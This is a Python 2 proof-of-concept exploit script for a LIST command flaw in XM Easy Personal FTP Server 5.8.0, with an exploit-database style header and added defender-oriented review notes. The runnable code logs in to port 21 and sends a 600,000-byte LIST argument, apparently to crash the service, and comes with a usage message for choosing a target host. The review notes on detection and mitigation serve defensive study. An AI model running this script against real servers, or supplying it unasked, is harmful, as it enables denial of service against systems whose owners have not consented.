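# Exploit Title: XM Easy Personal FTP Server LIST
# Date: 4/17/2010
# Author: Jeremiah Talamantes
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP, SP2
# CVE : N/A
# Code : http://www.redteamsecure.com/assets/company/exploits/xmftp/xmexploit.php
#!/usr/bin/python
"""Proof of concept for the LIST flaw reported in XM Easy Personal FTP Server 5.8.0.

What the code below does: it opens a TCP connection to port 21 of the given
host, reads the greeting, sends USER and PASS with the supplied credentials,
then sends a single ``list`` command whose argument is the string "./A"
repeated 200000 times (600000 bytes), and closes the socket without reading
a reply.

Review notes (defender's view):

* The oversized command is sent only after USER/PASS, so as written the
  trigger needs an account the server accepts. The replies to USER and PASS
  are read but never checked.
* The page does not state what the server does on receipt (crash, hang or
  memory corruption). Presumably the service crashes -- confirm in an
  isolated lab before relying on that.
* Detection: a control-channel line of this size is far longer than any
  legitimate path argument, so a length check on FTP commands flags it.
  The FTP service terminating shortly after a LIST from an authenticated
  session is a second signal.
* Mitigation: the page names no CVE and no fixed release. Limit who can
  reach and log in to the service, and enforce a maximum command length in
  front of it.

The script targets Python 2: socket payloads are native ``str`` and the
greeting is concatenated to a ``str``. The statements use syntax that parses
on either major version, but the runtime behaviour is the Python 2 one.
"""

import socket
import sys

# Banner rows, reproduced byte-for-byte from the original print statements.
_BANNER = (
    "\n#################################################################",
    "## RedTeam Security ##",
    "## XM Easy Personal FTP Server ##",
    "## Version 5.8.0 ##",
    "## LIST Vulnerability ##",
    "## ##",
    "## Jeremiah Talamantes ##",
    "## labs@redteamsecure.com ##",
    "################################################################# \n",
)


def _print_banner():
    """Print the author's banner, one row per line."""
    for row in _BANNER:
        print(row)


# Define the exploit's usage
def Usage():
    """Print the command-line synopsis and the author credit."""
    # The three positional arguments are the ones the entry point reads from
    # sys.argv[1:4]; the extracted page had lost them from this message.
    print("Usage: xmexploit.py <hostname> <username> <password>\n")
    print("\n\nCredit: Jeremiah Talamantes")
    print("RedTeam Security, LLC : www.redteamsecure.com/labs\n")


# Buffer settings. Change as necessary
# 200000 repetitions of the 3-byte string "./A" = 600000 bytes of LIST argument.
buffer = "./A" * 200000


def start(hostname, username, password):
    """Log in to the FTP service on ``hostname``:21 and send the long LIST line.

    Args:
        hostname: Host name or address of the FTP server.
        username: Account name sent with USER.
        password: Password sent with PASS.

    Exits the process with status 1 if the TCP connection cannot be opened.
    The socket is closed on every path out of the function.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        try:
            sock.connect((hostname, 21))
        except socket.error:
            # Only socket-level failures are treated as "unable to connect";
            # the original bare except also swallowed KeyboardInterrupt.
            print("Error: unable to connect to host")
            sys.exit(1)

        r = sock.recv(1024)
        print("[+] " + r)

        # Send username to server
        sock.send("USER %s\r\n" % username)
        r = sock.recv(1024)

        # Send password to server
        # NOTE(review): the reply is not inspected, so a rejected login is
        # not noticed and the LIST line below is sent regardless.
        sock.send("PASS %s\r\n" % password)
        r = sock.recv(1024)

        print("Sending the malicious chars...")

        # Send data to server
        sock.send("list %s\r\n" % buffer)
    finally:
        sock.close()


if __name__ == "__main__":
    _print_banner()
    if len(sys.argv) != 4:
        Usage()
        sys.exit(1)
    start(sys.argv[1], sys.argv[2], sys.argv[3])
    sys.exit(0)

# end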